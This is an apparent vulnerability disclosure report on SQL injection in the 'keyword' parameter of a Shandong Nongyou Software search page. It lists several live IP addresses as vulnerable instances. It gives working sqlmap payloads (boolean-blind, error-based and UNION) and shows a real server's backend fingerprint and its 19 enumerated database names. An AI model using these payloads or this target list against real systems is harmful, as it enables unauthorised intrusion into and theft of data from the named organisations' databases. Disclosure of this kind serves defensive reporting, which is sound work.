### Brief description:

As titled.

### Details:

Shandong Nongyou Software Co. official website: http://www.nongyou.com.cn/

Cases are as follows:

- http://222.135.127.190:7000/gov/SearchInfoSum.aspx?keyword=
- http://221.2.171.59:8000/gov/SearchInfoSum.aspx?keyword=
- http://222.135.109.70:8100/gov/SearchInfoSum.aspx?keyword=
- http://61.133.119.187:8089/gov/SearchInfoSum.aspx?keyword=
- http://221.2.156.181:8100//gov/SearchInfoSum.aspx?keyword=
- http://221.2.149.47:8100/gov/SearchInfoSum.aspx?keyword=

### Proof of vulnerability:

The `keyword` parameter is injectable. The `%' ... AND '%'='` framing of every payload below shows it is concatenated unescaped into a `LIKE '%...%'` literal.

Tested against: http://huodong.whinfo.net.cn/gov/SearchInfoSum.aspx?keyword=

```
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=%' AND 3437=3437 AND '%'='

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keyword=%' AND 2049=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(104)+CHAR(110)+CHAR(58)+(SELECT (CASE WHEN (2049=2049) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(106)+CHAR(97)+CHAR(122)+CHAR(58))) AND '%'='

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: keyword=%' UNION ALL SELECT CHAR(58)+CHAR(113)+CHAR(104)+CHAR(110)+CHAR(58)+CHAR(85)+CHAR(110)+CHAR(70)+CHAR(81)+CHAR(118)+CHAR(84)+CHAR(113)+CHAR(84)+CHAR(120)+CHAR(69)+CHAR(58)+CHAR(106)+CHAR(97)+CHAR(122)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[21:40:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[21:40:08] [INFO] fetching database names
[21:40:09] [INFO] the SQL query used returns 19 entries
[21:40:14] [INFO] retrieved: "3g_shop"
[21:40:15] [INFO] retrieved: "allMessage"
[21:40:20] [INFO] retrieved: "club_model"
[21:40:22] [INFO] retrieved: "eweb_gov"
[21:40:32] [INFO] retrieved: "eweb_serve"
[21:40:33] [INFO] retrieved: "eweb_sun"
[21:40:41] [INFO] retrieved: "kehuSns"
[21:40:45] [INFO] retrieved: "master"
[21:40:46] [INFO] retrieved: "model"
[21:40:52] [INFO] retrieved: "msdb"
[21:40:53] [INFO] retrieved: "NetSNS"
[21:40:57] [INFO] retrieved: "tempdb"
[21:41:05] [INFO] retrieved: "web800"
[21:41:06] [INFO] retrieved: "wh2_caijing"
[21:41:08] [INFO] retrieved: "wh2_favlife"
[21:41:09] [INFO] retrieved: "wh2_housenew"
[21:41:13] [INFO] retrieved: "wh2_search"
[21:41:14] [INFO] retrieved: "wh2_tbSMS"
[21:41:15] [INFO] retrieved: "whinfo_chat"
available databases [19]:
[*] 3g_shop
[*] allMessage
[*] club_model
[*] eweb_gov
[*] eweb_serve
[*] eweb_sun
[*] kehuSns
[*] master
[*] model
[*] msdb
[*] NetSNS
[*] tempdb
[*] web800
[*] wh2_caijing
[*] wh2_favlife
[*] wh2_housenew
[*] wh2_search
[*] wh2_tbSMS
[*] whinfo_chat
```